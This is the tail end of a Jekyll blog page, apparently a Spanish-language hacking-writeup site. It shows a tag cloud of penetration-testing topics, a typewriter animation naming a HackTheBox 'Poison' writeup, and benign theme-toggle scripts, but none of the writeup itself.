href="/tag/snmp%2C/" class="set-1">SNMP,</a> <a href="/tag/sqli/" class="set-1">SQLI</a> <a href="/tag/sqli%2C/" class="set-1">SQLI,</a> <a href="/tag/sqlinjecction%2C/" class="set-1">SQLInjecction,</a> <a href="/tag/ss%2C/" class="set-1">SS,</a> <a href="/tag/ssh%2C/" class="set-1">SSH,</a> <a href="/tag/ssrf/" class="set-1">SSRF</a> <a href="/tag/ssrf%2C/" class="set-1">SSRF,</a> <a href="/tag/ssti%28server/" class="set-1">SSTI(Server</a> <a href="/tag/suid%2C/" class="set-1">SUID,</a> <a href="/tag/sam%2C/" class="set-1">Sam,</a> <a href="/tag/samba%2C/" class="set-1">Samba,</a> <a href="/tag/scheduler%2C/" class="set-1">Scheduler,</a> <a href="/tag/script%2C/" class="set-1">Script,</a> <a href="/tag/secretsdump.py%2C/" class="set-1">SecretsDump.py,</a> <a href="/tag/secretsdumps.py%2C/" class="set-1">Secretsdumps.py,</a> <a href="/tag/security%2C/" class="set-1">Security,</a> <a href="/tag/shares/" class="set-1">Shares</a> <a href="/tag/sharphound.ps1%2C/" class="set-1">SharpHound.ps1,</a> <a href="/tag/shellshock%2C/" class="set-1">ShellShock,</a> <a href="/tag/side/" class="set-1">Side</a> <a href="/tag/smart/" class="set-1">Smart</a> <a href="/tag/smb%2C/" class="set-1">Smb,</a> <a href="/tag/smbclient%2C/" class="set-1">SmbClient,</a> <a href="/tag/smbmap%2C/" class="set-1">SmbMap,</a> <a href="/tag/sqsh%2C/" class="set-1">Sqsh,</a> <a href="/tag/starting/" class="set-1">Starting</a> <a href="/tag/steganografia%2C/" class="set-1">Steganografia,</a> <a href="/tag/subdomains%2C/" class="set-1">Subdomains,</a> <a href="/tag/sudo/" class="set-1">Sudo</a> <a href="/tag/system%2C/" class="set-1">System,</a> <a href="/tag/thm%2C/" class="set-1">THM,</a> <a href="/tag/template/" class="set-1">Template</a> <a href="/tag/tmux-priv%2C/" class="set-1">Tmux-Priv,</a> <a href="/tag/tomcat/" class="set-1">Tomcat</a> <a href="/tag/tomcat%2C/" class="set-1">Tomcat,</a> <a href="/tag/transfer%2C/" class="set-1">Transfer,</a> <a href="/tag/transferencia/" class="set-1">Transferencia</a> <a href="/tag/tryhackme%2C/" class="set-1">TryHackMe,</a> <a href="/tag/ubuntu/" class="set-1">Ubuntu</a> <a href="/tag/unrealirc%2C/" class="set-1">UnRealIRC,</a> <a href="/tag/upload/" class="set-1">Upload</a> <a href="/tag/userenum%2C/" class="set-1">Userenum,</a> <a href="/tag/vnc/" class="set-1">VNC</a> <a href="/tag/web/" class="set-2">Web</a> <a href="/tag/web3%2C/" class="set-1">Web3,</a> <a href="/tag/webshell%2C/" class="set-1">Webshell,</a> <a href="/tag/wget/" class="set-1">Wget</a> <a href="/tag/winpeas%2C/" class="set-1">WinPeas,</a> <a href="/tag/windows/" class="set-1">Windows</a> <a href="/tag/windows%2C/" class="set-1">Windows,</a> <a href="/tag/wordpress%2C/" class="set-1">Wordpress,</a> <a href="/tag/wpscan%2C/" class="set-1">Wpscan,</a> <a href="/tag/writeup/" class="set-2">Writeup</a> <a href="/tag/writeup%2C/" class="set-3">Writeup,</a> <a href="/tag/x-forwarder-for%2C/" class="set-1">X-Forwarder-For,</a> <a href="/tag/xp_cmdshell%2C/" class="set-1">Xp_CmdShell,</a> <a href="/tag/xp_dirtree%2C/" class="set-1">Xp_dirtree,</a> <a href="/tag/ysoserial%2C/" class="set-1">Ysoserial,</a> <a href="/tag/zona%2C/" class="set-1">Zona,</a> <a href="/tag/zone/" class="set-1">Zone</a> <a href="/tag/app-js%2C/" class="set-1">app-js,</a> <a href="/tag/bashscript%2C/" class="set-1">bashscript,</a> <a href="/tag/chisel%2C/" class="set-1">chisel,</a> <a href="/tag/de/" class="set-1">de</a> <a href="/tag/dompdf%2C/" class="set-1">dompdf,</a> <a href="/tag/ecppt%2C/" class="set-1">eCPPT,</a> <a href="/tag/fcrackzip%2C/" class="set-1">fcrackzip,</a> <a href="/tag/html/" class="set-1">html</a> <a href="/tag/injecction/" class="set-1">injecction</a> <a href="/tag/msfvenom%2C/" class="set-1">msfvenom,</a> <a href="/tag/nmap%2C/" class="set-1">nmap,</a> <a href="/tag/pfsense%2C/" class="set-1">pfSense,</a> <a href="/tag/pfx2john%2C/" class="set-1">pfx2john,</a> <a href="/tag/phpliteadmin%2C/" class="set-1">phpLiteAdmin,</a> <a href="/tag/privesc/" class="set-1">privesc</a> <a href="/tag/privesc%2C/" class="set-1">privesc,</a> <a href="/tag/python%2C/" class="set-1">python,</a> <a href="/tag/redis-cli%2C/" class="set-1">redis-cli,</a> <a href="/tag/rsync%2C/" class="set-1">rsync,</a> <a href="/tag/smtpd%2C/" class="set-1">smtpd,</a> <a href="/tag/socat%2C/" class="set-1">socat,</a> <a href="/tag/squidproxy%2C/" class="set-1">squidproxy,</a> <a href="/tag/steghide%2C/" class="set-1">steghide,</a> <a href="/tag/tar%2C/" class="set-1">tar,</a> <a href="/tag/webdav%2C/" class="set-1">webdav,</a> <a href="/tag/welcome/" class="set-1">welcome</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  




<script>
  let i = 0;
  const text = 'Writeup de la maquina de HackTheBox llamada POISON siguiendo el PATH para el OSCP';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
